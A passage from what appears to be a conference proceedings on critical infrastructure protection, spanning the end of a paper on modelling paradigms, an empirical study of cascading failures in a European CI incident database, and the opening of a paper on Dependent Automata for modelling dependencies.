It is not only the incomplete understanding that is problematic, but also the emergent interdependencies owing to the fast-growing rate of CI interconnection. The likelihood of crises within CIs is on the rise, owing to the fast growth rate of interconnections seen in modern CIs [7]. The principal reason is the addition of numerous new sub-systems. The ever-increasing connections caused by these additions can potentially be exploited by hostile attackers, or the extra complexity created may cause accidental failures. The development of ICT has facilitated new and more effective business models. However, the new technologies and the evolving operational modes generate unfamiliar risks. The risks have an "emergent character": they derive from interdependencies and circumstances that have not been anticipated by the designers and the users of CIs [3]. An example is the continuous and faithful performance of control systems, particularly of SCADA systems, which is crucial for CI. Most of these systems were designed during a past age of innocence when attacks were inconceivable and failures could be assumed to have only local consequences. These systems were designed for long life cycles (15 years or more) and for physically isolated operation, as proprietary systems, and - since they were "hidden" elements for the outsider - in a tradition of security-by-obscurity. The hardening of SCADA systems' security is an extremely costly and complicated endeavour requiring many years of reengineering. Recently, these systems have been connected to more open systems (i.e., the Internet) to improve their performance, but potentially reducing their security.

2.3 Crises in CI Are Dynamically Complex

The stages of a cross-border crisis lifecycle may be asynchronous. For example: a crisis may occur in one country and later spread to another country through cascading effects. Thus, one country's crisis is another country's precursor to a crisis. In addition, the asynchronous stages of a crisis may occur out of phase with each other. Hence, the questions are what the consequences of multiple out-of-phase crisis lifecycles are and how we can effectively deal with them. Time delays in such crisis situations make it difficult to identify relations between causes and effects, and could lead to the implementation of solutions that only offer short term benefits. Delays also make it difficult to capture data, as it will only be available for short periods during the occurrence of a crisis. Furthermore, the longer a crisis is expected to last, the more difficult it will be to acquire relevant data, as data collection systems may not be in place in those parts of the system where unexpected consequences show up.
2.4 There Is a Need for a Long Term Perspective

Interdependencies between CIs mean that disruptions and failures in one CI may cascade to others [8], with the potential to cause extended outages. As a severe consequence, restoring service and recovering from disruptive effects is likely to take a long time. In contrast to familiar security crises, which are short-duration and acute, CI crises - whether by failure or attack - could imply long-term, chronic disruption of vital operations. In a worst-case scenario, a successful attack on a CI might turn out to be a proof-of-concept for attack weapons that could become widely available to the highest bidding criminal or terrorist groups. In addition, they could be used to unleash high-consequence attacks against infrastructure in the energy or transport sector and other CIs of crucial importance for Society. The strategic aspects of crisis management have to include the whole lifecycle of crises [9]. Studies have shown that crises often have long incubation periods [10], [11]. Fink classified the crisis lifecycle in four stages [12], while Mitroff used five stages [13]. The three-stage approach is the more common one: Coombs labelled the three stages precrisis, crisis event and postcrisis [9]. This long term perspective demands a bird's eye view in temporal, spatial and configuration space. "Scenarios" have to be generalized to the strategic level, dealing with categories of disruptions and viewing crises as events with a long past, with numerous precursors and early warnings, followed by a critical phase with characteristics shaped by the anterior events and which might last for considerable time, since the replacement of vulnerable CIs cannot be achieved in a matter of days or weeks, and probably not even in months. As Coombs put it, "a crisis does not just happen, it evolves" [9]. It can therefore be argued that effective crisis management starts well in advance of the actual physical manifestation of the crisis. Ideally, all crises could be avoided if perfect early warning systems were in place and we understood the interrelationships between CIs. With a lifecycle view in mind, crisis management must encompass asynchronous management of the incubation periods, the physical manifestations of the crisis, the restoration periods and beyond. Hence, crisis management needs a long term approach, resolution of different perspectives and improvement of crisis communication, including the development of an appropriate new crisis vocabulary and taxonomy.

2.5 Knowledge about CI Is Fragmented

Since the exact nature of risk in interdependent CIs is not well understood, an effort is necessary to bring about greater understanding. This lack of understanding translates into a lack of written and numerical records. Consequently, knowledge about CI interdependencies continues to be fragmented in the minds of different experts. Only when this knowledge is brought together in an environment that encourages interaction and exchange of information will new knowledge about interdependencies in CI be created. As we know, knowledge creation is inherently a social process [14]. Hence, we should launch activities oriented towards the interaction of the different agents that could hold valuable pieces of knowledge. This must, by necessity, be multidisciplinary. CI security needs experienced technical staff who know how CIs work, ICT experts, managers, lawyers, psychologists and anybody else who could provide valuable insights. If we leave anybody out, we will be vulnerable.
3 Adaptation of the Modelling Paradigms to the Characteristics of CIs Interdependencies Problem

Over the years a variety of simulation paradigms have been developed and used to study strategic problems. Below we review some of these paradigms and attempt to judge their appropriateness for modelling interdependent CIs. Before we go on, it is appropriate to think about the meaning of a model. A model is always a simplification of reality [15]. When we build models we do our best to include the most important aspects, but there will always be something that must be left out. If not, the model would be huge and unmanageable, and would therefore lose its value as a tool that can help us make sense of a complex reality. Different paradigms make different omissions; hence no modelling paradigm is suited for every purpose.

Network Models and Derivatives: These models are built on mathematical network theory. A CI is represented as a network of vertices (nodes) interconnected by edges (links). These networks represent systems that have certain non-trivial topological features that do not occur in simple networks. The main contribution of traditional network models consists in showing what the network would be like if a node were added or removed. Although network analysis is very useful in building robust CI networks (or, for attackers, in choosing the attack target), it is unable to represent the transition from non-crisis to crisis to end-of-crisis. These models adopt a static perspective that does not include any dynamic element. Hence, they are not suitable for capturing either dynamic complexity or long term consequences. Nevertheless, they are very suitable for capturing and communicating the "network of networks" perspective.

Input-Output Models: I-O models build on the premise that output from one industry sector is input for one or more others and that there are equilibrium conditions between these. I-O models consider the structure of the economy and the flow of resources between the different sectors. The main weakness of I-O models is their "data dependency". Data, in addition to being scarce, are most often calibrated to annual data and intended to capture permanent changes and long term trends, smoothing out short term dynamics. Additionally, equilibrium conditions are implied in I-O models [16]. However, during a disruptive event there is no apparent reason why equilibrium, as it is normally defined in economics, should occur. I-O models, therefore, do not seem appropriate for modelling when the purpose is to understand the dynamics of the problem. However, I-O models may be appropriate if the goal is to see which sectors of the economy might be affected [17].

Agent-Based Models: Agent-Based modelling is a simulation methodology coming from the field of complexity science. A-B systems are comprised of multiple idiosyncratic agents. They represent complex system behaviour as the consequence of local interactions between agents and their environment. To construct an A-B model it is necessary to specify three main types of elements: agents, rules and the environment. The agents are the people or entities of the artificial societies. The environment is the framework or abstract space where the agents can interact, and the rules are behaviour patterns for the agents and the environment. These rules can take the relationship forms
of agent-environment, environment-environment and agent-agent. An insight of A-B models is that complex behaviour can arise from quite simple rules. Behaviour is said to be emergent, i.e., it arises endogenously. The main benefits of using A-B models are the possibility of representing heterogeneous agents, capturing emergent behaviour and creating a space where the agents interact according to distance [18]. Hence, A-B models are especially suitable when the interactions among agents are complex (nonlinear, discontinuous or discrete), when the population is heterogeneous or each individual is potentially different, when their geographical localization is key to the problem, or when the agents exhibit complex behaviours such as learning or adaptation. However, the implementation of A-B models embeds the agent rules into programming code, which makes them more difficult to communicate to people without modelling expertise.

System Dynamics Models: System Dynamics (SD) has been heavily shaped by the human sciences and is used to study complex social systems. Its record proves that SD is appropriate for studying any kind of complex, non-linear dynamic system, even purely technological systems. But one of its main advantages is its ability to effectively model sociotechnical systems, which consist of human, organizational and technological parts. The philosophical stance behind SD models is that complex systems are in essence feedback systems. That is, closed-loop relationships are ubiquitous in those systems: X affects Y, which in turn, directly or indirectly, affects X. SD is used when the individual properties are not decisive and high-level aggregation is desired or required for management purposes. SD encourages focusing not on isolated events but rather on the behaviour patterns that these events lead to. This high aggregation level makes it easier to analyse crises as evolutionary processes that could last long periods of time. Additionally, in SD models the system's feedback structure is explicitly represented, which gives them an advantage with respect to visual representation. Another strength of SD is that it has developed collaborative modelling methodologies where modellers work jointly with experts on the problem. This participation of the beneficiaries of the model from the early stages of its development also increases their confidence and acceptance. These collaborative methodologies are encompassed under the name "Group Model Building" [19]. We can conclude that significant improvements can be made on the CIs interdependencies problem using modelling and simulation techniques, especially if we are aware of the potential and weaknesses of the different modelling paradigms. Thus, identifying the main characteristics of the problem we want to analyse, and adopting the most suitable modelling technique, will enable us to yield the best results.
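As a minimal, hedged illustration of the network-model perspective reviewed above: the sketch below uses the networkx Python library to show what a dependency network loses when one node is removed. The sectors, links and the simple "broken links" metric are invented for the example; none of the cited models prescribes them.

```python
import networkx as nx

# Toy CI dependency graph: an arc (i, j) expresses that j depends on i.
G = nx.DiGraph([
    ("energy", "telecom"), ("energy", "water"), ("energy", "transport"),
    ("telecom", "finance"), ("telecom", "internet"), ("internet", "finance"),
])

baseline = G.number_of_edges()
for node in list(G.nodes):
    h = G.copy()
    h.remove_node(node)  # simulate the total failure of one infrastructure
    print(f"loss of {node}: {baseline - h.number_of_edges()} dependency links broken")
```

Note that, exactly as the text observes, such an analysis says nothing about when or how long the secondary outages occur; it only compares static topologies before and after the removal.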
References

1. Conrad, S.H., LeClaire, R.J., O'Reilly, G.P., Uzunalioglu, H.: Critical National Infrastructure Reliability Modeling and Analysis. Bell Labs Technical Journal 11(3), 57–71 (2006)
2. Chang, S.E., McDaniels, T.L., Mikawoz, J., Peterson, K.: Infrastructure failure interdependencies in extreme events: power outage consequences in the 1998 Ice Storm. Natural Hazards 41, 337–358 (2007)
3. Schneier, B.: Secrets & Lies: Digital Security in a Networked World. Wiley, New York (2000)
4. Mussington, D.: Concepts for Enhancing Critical Infrastructure Protection: Relating Y2K to CIP Research and Development. RAND Science and Technology Policy Institute (2002)
5. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research. Idaho National Laboratory, Critical Infrastructure Protection Division, Idaho Falls, Idaho (2006)
6. Rinaldi, S.M.: Modeling and Simulating Critical Infrastructures and Their Interdependencies. In: Proceedings of the 37th Hawaii International Conference on System Sciences, Hawaii (2004)
7. Bologna, S., Di Costanzo, G., Luiijf, E., Setola, R.: An Overview of R&D Activities in Europe on Critical Information Infrastructure Protection (CIIP). In: López, J. (ed.) CRITIS 2006. LNCS, vol. 4347, pp. 91–102. Springer, Heidelberg (2006)
8. Beyeler, W.E., Conrad, S.H., Corbet, T.F., O'Reilly, G.P., Picklesimer, D.: Inter-Infrastructure Modeling - Ports and Telecommunications. Bell Labs Technical Journal 9(2), 91–105 (2004)
9. Coombs, W.T.: Ongoing Crisis Communication: Planning, Managing and Responding, 2nd edn. Sage, Los Angeles (2007)
10. Turner, B.: The Organizational and Inter-organizational Development of Disasters. Administrative Science Quarterly 21(3), 378–397 (1976)
11. Vaughan, D.: Autonomy, Interdependence and Social Control: NASA and the Space Shuttle Challenger. Administrative Science Quarterly 35(2), 225–257 (1990)
12. Fink, S.: Crisis Management: Planning for the Inevitable. AMACOM, New York (1986)
13. Mitroff, I.I.: Crisis Management and Environmentalism: A Natural Fit. California Management Review 32(2), 101–113 (1994)
14. Nonaka, I., Takeuchi, H.: The Knowledge-Creating Company. Oxford University Press, New York (1995)
15. Sterman, J.D.: Business Dynamics: Systems Thinking and Modeling for a Complex World. Irwin/McGraw-Hill, Boston (2000)
16. Dauelsberg, L., Outkin, A.: Modeling Economic Impacts to Critical Infrastructures in a System Dynamics Framework. In: The 23rd International Conference of the System Dynamics Society, Boston (2005)
17. Kujawski, E.: Multi-Period Model for Disruptive Events in Interdependent Systems. Systems Engineering 9(4) (2006)
18. Borshchev, A., Filippov, A.: From System Dynamics and Discrete Event to Practical Agent Based Modeling: Reasons, Techniques, Tools. In: The 22nd International Conference of the System Dynamics Society, Oxford, UK (2004)
19. Andersen, D., Richardson, G.P., Vennix, J.M.: Group Model Building: Adding More Science to the Craft. System Dynamics Review 13(2), 187–201 (1997)
Empirical Findings on Critical Infrastructure Dependencies in Europe Eric Luiijf1 , Albert Nieuwenhuijs1, Marieke Klaver1 , Michel van Eeten2 , and Edite Cruz2 1
TNO Defence, Security and Safety, Oude Waalsdorperweg 63, 2597AK The Hague, The Netherlands {eric.luiijf,albert.nieuwenhuis,marieke.klaver}@tno.nl www.tno.nl 2 Faculty of Technology, Policy and Management Technical University of Delft, PO Box 5015, 2600 GA Delft, The Netherlands
[email protected] Abstract. One type of threat consistently identified as a key challenge for Critical Infrastructure Protection (CIP) is that of cascading effects caused by dependencies and interdependencies across different critical infrastructures (CI) and their services. This paper draws on a hitherto untapped data source on infrastructure dependencies: a daily maintained database containing over 2375 serious incidents in different CI all over the world as reported by news media. In this paper we analyse this data to discover patterns in CI failures in Europe, such as cascades, dependencies, and interdependencies. Some analysis results indicate that fewer sectors than many dependency models suggest drive cascading outages, and that cascading effects due to interdependencies are hardly reported.
1 Introduction

Most nations and the European Union [1] have identified that critical infrastructure (CI) dependencies are causes of major concern. A failure within a single CI may already be damaging enough to society. However, when such a failure cascades across CI boundaries, the potential for multi-infrastructure collapse and catastrophic damage is high. Various modelling and simulation efforts also stress the possibility of dependencies and cascading failure. But just how to rate this type of risk in comparison to other risk factors for CI remains unclear. While probabilities are unknown, the magnitude of the consequences of multi-sector collapse is so large that many argue that this factor alone pushes this risk to the top of national priority lists. Auerswald [2] calls CI dependencies the 'unmanaged challenge', which has proven to be less tractable than managing the vulnerabilities within a single CI: more pervasive and difficult to manage are the (inter)dependencies that exist among firms in different infrastructures. Most national CI protection (CIP) policies identify dependencies as a priority area. Adequately addressing this unmanaged challenge will draw substantial resources away from other CIP areas. The question is whether the risk associated with CI dependencies needs to be prioritised, and if so, for which set of CI. A confrontation with empirical data, even if scarce or incomplete, may help in decision-taking and prioritising. So far, such efforts - as far as the authors know - are by and large missing.
This paper draws on a hitherto untapped data source on CI dependencies: a database containing recordings of 2517 CI failures (as of July 30, 2008) and their cascading outages. The authors analyse this data to discover patterns in CI failures across different CI in the world, in Europe, and in the Netherlands. The outline of this paper is as follows: in Section 2 we review the state of the art of current research on CI dependencies. Section 3 briefly discusses the scope, method and limitations of our analysis. In Section 4, we present our data analysis findings for Europe. Section 5 contains the conclusions and the implications of our analysis.
2 Dependencies - State of the Art

Most of the CI dependency literature uses a theoretical modelling approach to dependencies, e.g., Rinaldi et al. [4] and Svendsen and Wolthuysen [6]. Most post mortem analysis reports about CI disruption incidents describe the incident from a single CI view, e.g., [9]. Cascading effects and dependency consequences are often hidden in government reports about their emergency response efforts to disasters, e.g., Von Kirchbach [8]. Other research focuses on the modelling and simulation of CI and cross-links between different CI sectors [3]. Generally speaking, these models are not based on real life data or on a full dependency analysis of past incidents. The empirical work in this paper discusses observations made on CI dependencies based on news and other reports about serious CI events. There do exist databases which focus on collecting empirical data on infrastructure incidents. Without exception, however, these databases focus on a specific environment, a single CI sector, or a specific type of risk. Examples of the foci of such databases are terrorism-caused energy infrastructure disruptions, process industry safety, electric power disturbances (e.g., national or European grid disturbance reports), radiological incidents, and aircraft incidents (e.g., [5,7,10]). No databases have been found which focus on serious disturbances of all CI and their cascading effects using an 'all-hazards' approach.
3 Method

At the core of our analysis is a database with public reports of CI disruptions, collected from open sources like newspapers and internet news outlets. Where possible, the data is augmented by official incident reports. An event in one of the CI sectors is added to the database only if there is a serious impact: only events are recorded which had a noticeable effect on society, e.g., at least 10,000 affected electric power customers. Daily occurring local and scheduled operational disturbances are excluded. For each event we record, e.g., the affected CI sector and service, the initiating event, the concerned organisation(s), start and end times/dates, country, affected geographic area and its size, a description of the cause, threat category and subcategory, consequences/damages and impact, the recovery process, and references. While data has been collected on a variety of countries in the world, for the purposes of this paper we focus on a subset: 1749 CI failure incidents in 29 European nations (95% of them occurred after 2000). Based on this
subset, we empirically study CI (inter)dependencies. A CI dependency is the relationship between two CI products or services in which one product or service is required for the generation of the other product or service; a CI interdependency is a mutual CI dependency. We understand that the data set and approach have limitations. We explored the validity of the findings by triangulating the Dutch national data with outage data from a Dutch CI operator. We also found self-similarities in the Dutch, EU and US subsets of the event database. However, we realise that the data is biased by the limited set of European languages (Dutch, English, French, German, Portuguese, and Spanish) which we use to identify and extract media reports. Another bias may be the reporting practices of news media, as not every serious CI incident is reported by news media. Among other factors, the news reports likely reflect what the news outlets assume is of interest to their audience. It is not clear if and how our findings are affected by these limitations. We are not aware of any research that has studied biases in how the media report on CI failures. That said, we believe that in light of the overall paucity of empirical research on this topic our analysis contributes much needed data to the policy debates on CIP and the risk of CI cascading failure. In our analysis, we classify events into cascade initiating events, cascade resulting events and independent events. A cascade initiating event is an event that causes an event in another CI or CI service; a cascade resulting event is an event that results from an event in another CI or CI service; and an independent event is an event that is neither a cascade initiating event nor a cascade resulting event. These categories are not mutually exclusive. Because an event can be both caused by an event outside a CI sector and propagate as another event outside the CI sector, some events are both a cascade initiating and a cascade resulting event. This may cause the sum of initiating, resulting and independent events to exceed the total number of events (e.g., the "Total" column in Table 1). The analysis below is performed at the level of CI services. This means that we only consider a cascade resulting event to be a dependency - and include it in the results - if the event takes place in another CI service than the one of the cascade initiating event. For readability, most results below are aggregated to the CI sector level. Consequently, dependencies between underlying services within a CI sector appear as occurring within a single CI sector.
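A hedged sketch of this classification as it could be computed over the event records (the field names `service` and `caused_by`, and the list-of-dicts representation, are our assumptions; the database schema is not published in this form):

```python
def classify(events):
    # events: list of dicts with "service" and "caused_by" (index or None);
    # a cross-service cause makes the causer initiating, the causee resulting.
    initiating = set()
    for e in events:
        c = e["caused_by"]
        if c is not None and events[c]["service"] != e["service"]:
            initiating.add(c)
    out = []
    for i, e in enumerate(events):
        c = e["caused_by"]
        resulting = c is not None and events[c]["service"] != e["service"]
        out.append({"initiating": i in initiating,
                    "resulting": resulting,
                    "independent": i not in initiating and not resulting})
    return out
```

An event can be flagged both initiating and resulting at once, which is exactly why the category sums in Table 1 can exceed the number of events.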
4 CI Dependencies in Europe

4.1 Number of Cascades

We first analysed the data by distinguishing cascading events from non-cascading events (Table 1). Interestingly, 29% of the reported incidents in Europe result from incidents in other services (501 of the 1749 events). Anecdotal evidence about dependencies and cascading sometimes conveys the sense of reporting on rather unlikely scenarios, suggesting that cascades are events of low probability and high consequence. Our data, however, shows that they are significantly more frequent.
Table 1. Categorisation of number of CI disruption events (number of events)

CI Sector            Cascade initiating   Cascade resulting   Independent   Total   Sample size
Education                     0                    3                1          4         4
Energy                      146                   76              388        609       590
Financial Services            1                   26               33         60        60
Food                          0                    4                3          8         8
Government                    2                   40               26         68        67
Health                        1                   16               22         39        39
Industry                      5                   15                7         27        27
Internet                     15                   51               95        161       160
Postal Services               1                    0                0          1         1
Telecom                      69                  125              114        308       295
Transport                    19                  128              276        423       422
Water                         9                   18               51         78        76
Total                       268                  501             1017       1786      1749
4.2 Directionality of Cascades

Next, we established in which CI sector an event originates and which CI sectors are affected (Table 2). The events that are not cascade-related are labelled "no sector". They comprise disruptions due to a large range of external events (e.g., weather, deliberate human actions, and economic factors) and internal failures (e.g., human error, technical failure). Table 2 shows that the energy and telecommunication sectors are the main cascade initiating sectors. Energy is the only sector which initiates more cascades than it ends up receiving. When disregarding non-cascade-initiated events, the empirical data confirms that the dependency matrix is sparsely populated and that cascades are highly asymmetrical. The energy and telecommunication sectors cause outages in other sectors (60% and 24% respectively), but not many other CI sectors cause outages in energy, telecommunication and internet (Table 2). The affected energy, telecommunication and internet sector event percentages of 15%, 25% and 10%, respectively, are for a large part generated by services within these three sectors. In short, the dependencies are very focused and directional. In fact, one may want to stop talking about interdependencies, as this suggests a reciprocal relationship that the data simply does not warrant as occurring frequently. Actually, only two weak European interdependencies are recorded. This raises an important issue: does this mean that, while dependencies and interdependencies are everywhere, at least theoretically, they are rarely strong enough to trigger a secondary outage which is reported by the news media? Do they only occur after a longer period of disruption than is often the case? Or are these cascading outage events so hidden in the chaos caused by the primary CI outage and its effects that the press does not report on them? The dependency of many sectors on energy and telecommunications has been reported widely. The Table 3 data suggests that the CI dependency on energy is substantially higher (taking mitigation measures into account), as 60% of all cascades originate within the energy sector, 28% in the telecommunication and internet sectors, 5% in the transport sector, 3% in the water sector, and 4% in the remaining CI.
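A minimal sketch of how such an initiating-by-affected matrix can be tallied from the event records (again under our assumed record fields `sector` and `caused_by`; the paper does not publish its tooling):

```python
from collections import Counter

def dependency_matrix(events):
    # Count (initiating sector, affected sector) pairs; events without a
    # cascade cause are attributed to "no sector", as in Table 2.
    m = Counter()
    for e in events:
        c = e["caused_by"]
        src = events[c]["sector"] if c is not None else "no sector"
        m[(src, e["sector"])] += 1
    return m
```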
Table 2. Events categorised by initiating sector and affected sector (# of events)
[Matrix: rows give the affected CI sector (Education, Energy, Financial Services, Food, Government, Health, Industry, Internet, Postal Services, Telecom, Transport, Water, Total); columns give the initiating sector (No sector, Energy, Financial Services, Government, Health, Industry, Internet, Postal, Telecom, Transport, Water) plus a Grand Total. The "No sector" column (events without a cascade cause) reads 1, 515, 34, 4, 27, 23, 12, 109, 1, 170, 294, 58, summing to 1248; the Grand Total column sums to 1749.]
4.3 Energy and Telecom Sector Services

A good practice is to strictly separate the office automation and the SCADA environments and to have a strictly controlled data exchange between these environments, if required at all. The Energy sector column in Table 2 shows that the energy sector is an important cascade initiating sector for almost all sectors. The second largest is the telecommunication sector. When we consider the energy sector services in Europe, it can be concluded that the initiating events for a large majority originate within the electric power service (see Table 3). It can be deduced that serious disruptions of electric power have affected almost all CI sectors and services. When also considering cascading between CI services within a CI sector, 61 dependencies exist between the electric power sector services generation, transmission and distribution. In only four cases were the oil and gas subsectors affected. The telecommunication services fall into the backbone networks and their services, cable/CATV services, the fixed telecommunication infrastructure (e.g., POTS, DSL, leased line and alarm line services), and mobile telephony (incl. SMS). As the Telecom sector column in Table 2 indicates, this sector is an important initiator of events in the financial services, the government services, and the internet and telecom sectors themselves. Due to the sector structure, disruptions of telecom backbones more seriously affect internet services than other telecom services. In the same way, the loss of cable/CATV services affects internet access and voice services.
Table 3. Cascade initiated events categorised by affected sector (percentage of events contributed to an affected sector)
[Matrix: rows give the affected CI sector (Education through Water, plus Total); columns give the initiating sector (Energy, Financial Services, Government, Health, Industry, Internet, Postal, Telecom, Transport, Water) plus a Grand Total; a bottom row gives the number of cascade resulting events per initiating sector, summing to 501.]
Detailed analysis of the database shows that the financial sector only seems to be affected by disruptions in the fixed telecommunications infrastructure through the functioning of automated teller machines and electronic payment systems. GSM/UMTS, emergency response and 1-1-2 services are affected by fixed telecom failures.

4.4 Escalation of Cascades

The domino theory suggests that serious CI failures result in a sequence of disruptions in other CI. Table 5, however, shows that on average a cascade initiating event in the energy sector triggers 2.06 disruptions in other CI services. A cascade initiating event in the telecommunication sector on average triggers 1.86 disruptions in other CI services. Considering all events (including all independent events), Table 5 also shows that one out of two events in the energy sector triggers a disruption in another CI, and just above two out of five events in the telecommunication sector trigger another disruption. Analysis also shows that 421 events, or 24% of the 1749 events, are first-level cascade events, 76 events (4%) are the result of a second cascade, and 4 events are caused by a third cascade. No deeper cascades have been found, neither in Europe nor internationally.
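A small sketch of how such cascade depths can be counted over the event records (with our illustrative `caused_by` field: depth 0 events are independent or purely initiating, depth 1 are first-level cascades, and so on):

```python
from collections import Counter

def depth_histogram(events):
    # events[i]["caused_by"]: index of the triggering event, or None
    def depth(i):
        d = 0
        while events[i]["caused_by"] is not None:
            i = events[i]["caused_by"]
            d += 1
        return d
    return Counter(depth(i) for i in range(len(events)))
```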
Table 4. Cascade initiated events categorised by CI sector service (percentage of events contributed to an affected sector)
[Matrix: rows give the affected sector (Education through Water, plus Total); columns are grouped into Energy Sector services (Electric Power, Gas, Oil, # events Energy) and Telecom Sector services excluding Internet (Backbone, Cable/CATV, Fixed telecom, Mobile Telephony, SMS, # events Telecom).]
Table 5. Categorisation of number of CI events (# of events CI sector to sector)

Initiating Sector    Avg. # of resulting   Sample   Avg. # of resulting      Sample
                     events if cascading   size     events from all events   size
Education                    -                0             0.00                4
Energy                      2.06            146             0.51              590
Financial Services          3.00              1             0.05               60
Food                         -                0             0.00                8
Government                  1.00              2             0.03               67
Health                      1.00              1             0.03               39
Industry                    2.20              5             0.37               27
Internet                    1.20             15             0.11              160
Postal Services             1.00              1             0.11                1
Telecom                     1.86             69             0.43              295
Transport                   1.26             19             0.06              422
Water                       1.67              9             0.20               76
Total                       1.88            268             0.29             1749
5 Conclusions

Our findings raise several important issues. First, while the current literature gives very few clues as to the probability of cascading failures, our empirical data suggests that
such cascades are in fact fairly frequent. This forms a sharp contrast with the typical examples of events of low probability and high consequence that are often presented as evidence of the urgency of dealing with CI dependencies. Second, they question the validity of the Domino Theory of CI. While an almost unlimited number of dependencies and interdependencies among CI are possible, i.e., there are many pathways along which failures may propagate across CI sector boundaries, we found that this potential is not expressed in the empirical data on actual events. The cascades that were reported were highly asymmetrical and focused. The overwhelming majority of them originated in the energy and telecom sectors. This is not unexpected, but what is new is the fact that so few cascades took place in other CI sectors. Third, interdependencies occur far less often than analysts have consistently modelled. We found only two cases in a total of some 770 CI failures. In short, while dependencies and interdependencies exist everywhere, they rarely appear to be strong enough to trigger a reported serious cascading CI outage. It is unclear whether this is because the CI operators manage the (inter)dependencies effectively or because the dependencies are not that powerful to begin with. In any case, it seems that CI are either more loosely coupled than the Domino Theory suggests, or that the CI dependencies occur at a more technical level, not becoming visible in news reports. Of course, there are a couple of qualifications that go with this conclusion. First of all, our findings do not rule out the possibility of multi-sector failure, i.e., we still face the possibility of scenarios of low probability and high consequence. Second, even if the Domino Theory is misleading, that does not negate the fact that damages resulting from cascades initiated by the energy and telecommunication sectors can be substantial. The third implication of our analysis is that it does not support the idea that CI dependencies are the unmanaged challenge. While there is an intuitive appeal to this idea, it may in fact be a myth. If we assume a vast web of dependencies that can trigger cascades, then it seems inevitable that we end up with a shortfall in the governance of this risk. But the evidence suggests that even if we assume this shortfall to exist, it does not translate into frequent deep cascades. Dependencies seem to be anything but unmanaged. Nevertheless, governance is needed. For instance, the high reliability of electricity and other CI services is anything but guaranteed in Europe. Moreover, the CI sectors that depend on the energy and telecom sectors can improve their strategies to manage those dependencies. In sum, the sobering conclusion emerges that CI cascading dependencies are focused on a limited number of CI sectors, occur more frequently than expected, and do not often cascade deeply.
Acknowledgement

The research described above was partly funded by the EU Commission as part of the 6th framework programme project IRRIIS under contract number FP6-2005-IST-4 027568 and partly under the Dutch Next Generation Infrastructure (NGI) research programme.
References

1. European Commission: Proposal for a Directive of the Council on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection, COM (2006) 787 final, Communication from the Commission to the Council and the European Parliament, Brussels (December 12, 2006)
2. Auerswald, P.E.: Complexity and Interdependence: The Unmanaged Challenge. In: Auerswald, P.E., Branscomb, L.M., La Porte, T.M., Michel-Kerjan, E.O. (eds.) Seeds of Disaster, Roots and Response: How Private Action can Reduce Public Vulnerability, Cambridge, p. 157 (2006)
3. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research (2006)
4. Rinaldi, S.M., Peerenboom, J., Kelly, T.: Complexities in Identifying, Understanding, and Analyzing Critical Infrastructure Dependencies. Special issue of the IEEE Control Systems Magazine on Complex Interactive Networks (December 2001)
5. Simonoff, J., Restrepo, C., Zimmerman, R., Naphtali, Z.: Analysis of Electrical and Oil and Gas Pipeline Failures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection. IFIP WG 11.10 series in Critical Infrastructure Protection (2008)
6. Svendsen, N.K., Wolthuysen, S.D.: Connectivity models of interdependency in mixed-type critical infrastructure networks. Information Security Technical Report 12(1), 44–55 (2006)
7. Zimmerman, R., Restrepo, C.: The next step: Quantifying infrastructure interdependencies to improve security. International Journal of Critical Infrastructures 2(2-3), 215–230 (2006)
8. Von Kirchbach, H.-P., et al.: Bericht der Unabhängigen Kommission der Sächsischen Staatsregierung Flutkatastrophe 2002 (2003)
9. UCTE: Final report - System Disturbance on 4 November 2006, UCTE (2006), http://www.ucte.org/library/otherreports/Final-Report-20070130.pdf
10. ENSAD database, http://gabe.web.psi.ch/research/ra (last visited: July 29, 2008)
Dependent Automata for the Modelling of Dependencies Susanna Donatelli Dipartimento di Informatica, Università di Torino, Torino, Italy
[email protected] Abstract. As far as we know there is no definition of dependency in a formal setting: to fill this gap we propose in this paper a state-based formalism called (network of) Dependent Automata, which considers dependencies as central elements. When used for modelling interdependencies in critical infrastructures, each infrastructure is modelled as a Dependent Automaton, which accounts for local behaviour and for dependencies from and to other infrastructures, while the whole system is obtained by composition of the automata of the infrastructures considered.
1 Introduction
Interdependency and infrastructure interdependencies have become popular terms in recent years, drawing a significant amount of interest from researchers and governmental agencies, especially after the power crisis in North America [15] and big infrastructure disruptions like the one caused by the Italian blackout of 2003 [19]. The seminal work of Rinaldi, Peerenboom and Kelly [18] identifies six dimensions in the critical infrastructure interdependency space, one of which, the type of failure, is the one we concentrate upon in this paper. Studies of critical infrastructures make use of graph models, equations, complex adaptive systems [12] and agent models: an extended survey of some of the approaches and tools can be found in [14,10,9]. In graph-based approaches (as in [18,3,13]) each infrastructure is a node, dependencies are arcs, and an arc (i, j) expresses the operational dependency of j upon i, possibly quantified according to some metric (usually a probability or a delay in quantitative approaches); the analysis studies the effect of the failure of a node (one infrastructure) on the rest of the system. The studies based on mathematical equations, like the ones inspired by the Leontief economic model [5], have similar objectives: when applied in the infrastructure analysis context, each infrastructure is seen as an input-output node that takes a number of input variables representing the operability of the other infrastructures on which it depends, and elaborates new values of the operability it offers to other infrastructures, expressed as values of its output variables. Agent-based models (as in [20]) model the system as a set of agents:
This work has been supported by the European project CRUTIAL (Critical Utility InfrastructurAL resilience) IST-FP6-STREP-027513.
agents can "sense" changes of state in the system and react according to metaknowledge to simulate the effect of state changes. The approach we take in this paper is instead "microscopic", and can be seen as complementary: we consider two infrastructures that heavily depend on each other, model them using automata, which allow for an arbitrary level of detail in the description of the infrastructure behaviour, and we study a formalism that allows one to specify how one infrastructure (automaton) depends on the other (and vice versa). The aim of our investigation is to find a formal setting in which models whose behaviour depends on other models can be represented, and in which the three types of failures considered in critical infrastructure interdependencies (cascading, escalating and common-cause failures [18]) can be adequately and precisely described. A cascading failure occurs when a disruption in one infrastructure causes the failure of a component in a second infrastructure, which subsequently causes a disruption in the second infrastructure [18]. This definition was slightly simplified in [17]. An escalating failure occurs when an existing disruption in one infrastructure exacerbates an independent disruption of a second infrastructure, generally in the form of increasing the severity or the time for recovery or restoration of the second failure [18]. Finally, a common-cause failure occurs when two or more infrastructure networks are disrupted at the same time: components within each network fail because of some common cause [18]. The underlying conceptual hypothesis of this work is that, to be able to describe (inter)dependencies between components, and to be able to capture cascading/escalating and common-cause failures, we need a language that allows us to discriminate causes and effects, and in particular local causes (inside a component) from global causes (from outside a component), and local effects (on the component 